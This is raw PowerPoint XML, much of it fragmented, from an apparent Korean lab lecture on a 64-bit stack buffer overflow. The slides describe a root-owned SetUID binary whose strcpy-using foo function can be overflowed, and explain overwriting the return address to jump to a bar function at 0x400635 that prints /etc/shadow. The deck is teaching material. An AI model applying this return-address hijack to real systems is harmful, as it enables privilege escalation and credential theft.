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64" r:id="rId3"/>
    <p:sldId id="665" r:id="rId4"/>
    <p:sldId id="666" r:id="rId5"/>
    <p:sldId id="667" r:id="rId6"/>
    <p:sldId id="668" r:id="rId7"/>
    <p:sldId id="660" r:id="rId8"/>
    <p:sldId id="659" r:id="rId9"/>
    <p:sldId id="658" r:id="rId10"/>
    <p:sldId id="661" r:id="rId11"/>
    <p:sldId id="663" r:id="rId12"/>
    <p:sldId id="308" r:id="rId13"/>
    <p:sldId id="309" r:id="rId14"/>
    <p:sldId id="310" r:id="rId15"/>
    <p:sldId id="311" r:id="rId16"/>
    <p:sldId id="315" r:id="rId17"/>
    <p:sldId id="316" r:id="rId18"/>
    <p:sldId id="317" r:id="rId19"/>
    <p:sldId id="669" r:id="rId20"/>
    <p:sldId id="312" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="314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6" r:id="rId31"/>
    <p:sldId id="32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948D-9DA1-4521-AFCE-7B34049E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F5857-4358-4CD0-9D32-D887D0463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B4BE4-14DD-4DA7-A2B6-EE732C38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DC200-FFFF-4047-8CF6-DBA73D28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8E612-D4AF-42F1-B69F-09B38798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2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58444-425D-4E17-80F9-823CF45C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9C3EE-9191-4BA0-917A-F4FAE27D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9C9D5-81C1-42FB-A0B5-5618E92E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9A927-8C33-4FBF-A95C-58F4B64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E70C6-B90A-4E9C-8CF8-72CF71D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5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32A076-B18F-4663-8F99-A7C88E3D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BCEEA-7EDE-4347-96C6-9D6045D0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97B30-10AD-4820-8FD0-59EDF5A4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E6269-CCC5-49DD-B673-4526B0E1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1402-E051-4E91-98C5-AA4D814F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D6687-7149-48B3-A7BE-9ACC254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E2EF7-3030-48B8-B319-B4A4231F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32C4B-A0D5-4D84-8CF6-227EF386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39F18-D5F5-442A-976B-157EB0F6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A73D2-B100-49D7-8943-BFDE2B5A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8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9C457-663A-48C7-A247-9C525F1E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044C9-8707-4502-8B89-8CA6E2E6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1F6D6-1680-4289-90B0-36FA58CF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160ED-0D49-44FC-B32A-CCCBE483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97FFD-5740-4468-8BBE-8E67FE62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9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814C1-E121-4525-B46E-A427274F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61DBE-E01A-4E4F-BD07-AC84B9AF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D02FF-3FF8-4012-889F-AB3D1D37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470CE-46A2-4030-B1CC-EA321F2C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1F87B-62C9-479D-9C10-49D44D29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79151-EAA2-48B6-BE1B-17F1C96B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5DFD4-2619-4A79-9C56-FF362EA1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86F0D-441E-466C-924C-43D1CB95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80CA9-A508-4F5C-87D3-ECD07CA05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E94224-AF94-438E-B3E0-AE2E85C82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B80455-445E-4DC9-B318-5F488995B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FB2D02-E54B-4BB3-B21C-1F330B0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A094-F9C7-411B-83F9-F2229CD8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CB2372-F302-47CC-83D4-8471EE4C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8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1652-926D-4658-BA08-4B299A4F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B00FE-3F66-4488-8637-EF931996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A3528-13CC-4C4D-9C85-0BDABC9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DD3AD-1D1F-4C4C-B9E5-BF9FC6A8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6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48D5-91E2-401D-9184-965E42F7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32814B-D45D-4BA4-8BD3-50F4F443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3C5C9-94E6-4812-BBAC-F04661B9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8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C765C-6EF5-4205-B855-8B1382EB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F5689-7D31-4E04-8AB1-AB56B002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8808D-077E-4DB4-BE38-1476859E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18C73-7958-41F1-96A5-4801CFDA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87773-0D67-4131-9445-0667604F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2BFCB-CC6D-436A-B30A-BF8B299B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7ACFF-3ED6-49C0-A83F-412F480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BFE08-1416-4159-9EF0-9D05AEF5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4D8FF-5BBB-47DE-A29F-C16BE9E5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4C8A3-E387-4CD3-908B-089384B6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1B450-C5C7-4973-9707-677A42D8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81689-F66F-4CF8-837B-A42D1AD8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65B519-4FD0-4636-97BE-2A2DBDC1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66026-C029-447C-AD08-3F0FD188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600F5-86D3-4E39-9E67-BB5DDF96F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603F-8282-46AB-8695-E19A854486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01FE9-48DE-42C6-AB73-AA1D17766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0D863-0B69-4A97-B32D-3F7DEB8D8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7452-056D-43B9-8F08-5A2521191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9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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.b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bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.b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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55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4A43D-701B-4707-8049-8D7E0FB4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A22DF-4B45-48FB-9681-9DACF44B6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강</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Bof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96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BB2ACF1-7215-471F-B6E0-081714EE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4" y="2026232"/>
            <a:ext cx="5297351" cy="36613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범용 레지스터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814B75-819F-46B6-805F-DCFADAC9A079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="2104792"/>
            <a:ext cx="191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A0F43-3065-463B-AA7E-1BE7E4F501B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2026232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 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 저장한다  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=  SFP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5706FD-9937-4194-AFF6-E3D0A0106830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2287672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FB1239-C138-4054-A166-AB6EDBB73630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2209112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 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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에 저장한다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6CC0EE-73CC-4F0A-BF8A-8D3CE56E21F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639056" y="2470552"/>
            <a:ext cx="154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D97CC9-140F-4D29-B084-C95A8E1A2B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2391992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Esp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의 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x60 = 96</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 늘린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. = 4*20 + 16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17A26B-8831-4F91-B2E8-43B1247E816D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="2818024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2864CE-DD73-473B-B555-ADE96938F605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2739464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합</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(heap) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>할당 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: C = malloc( … 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70704F-5A0F-492C-AAF0-C839C1873D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2644288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AC2E85-44A3-4DEE-BB89-501E28F3DEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2565728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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 변수인자를 넘긴다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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(int) = 4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577BA5E-8017-444A-9A91-C0B6C7A4B0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="3350440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BBD97C-B661-4011-B444-4AC86E842C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3271880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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 함수 실행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BA41DCC-AF07-4580-AB69-C13A8D9C53A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992624" y="3176704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F293D1-6206-4F1B-AC1F-CD47C6DAD71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3098144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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill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</a:rPr>
              <a:t>, “1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 불러온다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47B542-A4CF-4072-9489-3728752EDE75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="4172712"/>
            <a:ext cx="2072640" cy="1389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b[20]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DCCBB6-017A-402A-B708-811B6BF387E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5733971"/>
            <a:ext cx="2072640" cy="1310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7876E6-393C-4271-A80A-EF5EF6010938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="4188640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D89857-6779-428D-99B5-38FAC8527C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6906768" y="3882169"/>
            <a:ext cx="831070" cy="385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rsp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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 96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DAC04E-0C32-43B0-AE3D-BA9C91FFFF21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="5865041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812DE2-FDDD-4FBB-AEF5-28F1A9DEE926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174992" y="5786481"/>
            <a:ext cx="562846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8BC1DB-0D7E-4E08-92B1-8CEC56FA449D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5591548"/>
            <a:ext cx="2072640" cy="1310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SFP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A9566A-0DCB-4211-8558-813E6E6D105C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784592" y="5562600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B4D0-BB90-450D-BFD1-71537A50D05F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="5484040"/>
            <a:ext cx="831070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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16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6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범용 레지스터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1981065-B258-4705-9F49-9AA19C7D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87904"/>
            <a:ext cx="3918131" cy="36699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D14B9-5DA6-4AE7-A5BF-CD6E8EFF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22" y="2779296"/>
            <a:ext cx="6391275" cy="781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D57461-3057-40F9-9CC6-D61932E99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422" y="2172080"/>
            <a:ext cx="2615847" cy="565023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 4" descr="아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB771A46-7BCD-40E5-A3BF-DE7EC893F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1" r="33210" b="63562"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5289422" y="4634961"/>
            <a:ext cx="2194561" cy="17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아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C12FD55D-CE08-44EF-9306-0B7493689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48557" r="66513" b="18054"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7687057" y="4710113"/>
            <a:ext cx="220675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F0021EB-70AC-4C11-81DE-8C81281EF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422" y="3579347"/>
            <a:ext cx="5572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존재하는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디스어셈블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 intel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이름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4016FD-501C-4282-900C-883412B2BAA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24D9F0-FF13-4AF3-8FF3-E28D36330FB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8CD331-CD08-4A67-9051-38693C5B197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6D6D78E-F1DC-4B1A-9DB9-A4115BF300E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97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 dirty="0"/>
              <a:t>파일의 속성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SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 실행 가능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/bof64.c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vim bof64.c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foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill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</a:rPr>
              <a:t>strcpy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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 사용됨을 확인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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함을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 dirty="0"/>
              <a:t>파일을 실행하여 힌트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AAAA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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 이용하여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복귀 주소를 조작하면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함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1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48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727D84AA-90AB-4EB7-B278-E4DDF745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" y="1398059"/>
            <a:ext cx="403479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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D58818-0FB8-42B4-AB48-3554D670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3" y="3047806"/>
            <a:ext cx="4989449" cy="281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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A528125-FF0A-4A9C-A648-6C05C1C390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67" b="56894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318251" y="899528"/>
            <a:ext cx="2997200" cy="880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9A5F22-DB43-4D03-88B5-651588C39286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6301370" y="2457302"/>
          <a:ext cx="4932807" cy="3703407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36843578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="287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35548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33046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직후의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85868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38913" name="_x564967160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EBF08F-9CBE-4E11-BC20-9429D801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0" y="3075572"/>
            <a:ext cx="3552825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783DDA-DF65-46EC-9240-900D44B585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BA43B6-A757-4F14-B55A-F621E8A1D6A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EFBF47-2D0F-4850-87A0-9DF7152DABE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F1F6CCCE-BE66-417C-A423-039F4B05EE2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04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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d bof64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취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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버퍼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의 시작 주소가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rbp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- 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인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54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14AF77C-BB85-48EE-A741-3945FDC0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5" y="936036"/>
            <a:ext cx="5014341" cy="27857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3E368D99-6D3F-4489-A11B-6A622DFC0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" b="35736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="4108245"/>
            <a:ext cx="4947604" cy="20639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E60104-4003-4ECA-892D-8CA49033ECAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6321475" y="461749"/>
          <a:ext cx="5340017" cy="5891961"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5340017">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848009183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2233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454" marR="41454" marT="11461" marB="114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73759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="56586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진입한 시점의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버퍼의 크기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더 긴 문자열을 넘기면 아래와 같이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복귀할 때 사용되는 주소를 변경시킬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454" marR="41454" marT="11461" marB="114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48564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="_x564918704">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB62A56-5106-4732-A942-17A4F364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91" y="3862882"/>
            <a:ext cx="3070601" cy="24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564938504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D06182-F8BD-488A-BBDC-63F3AD814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" r="131"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6528131" y="993564"/>
            <a:ext cx="3109161" cy="23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DD21F57-1402-4FBE-B2FF-056962736F9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EE55675-A8F8-4E2F-900E-930F6F26EA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C8D1AF-BF0A-45CE-93C0-3B3C5A977C6C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6047B1F9-F462-4312-AEE5-1989BAAF7D6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14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취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
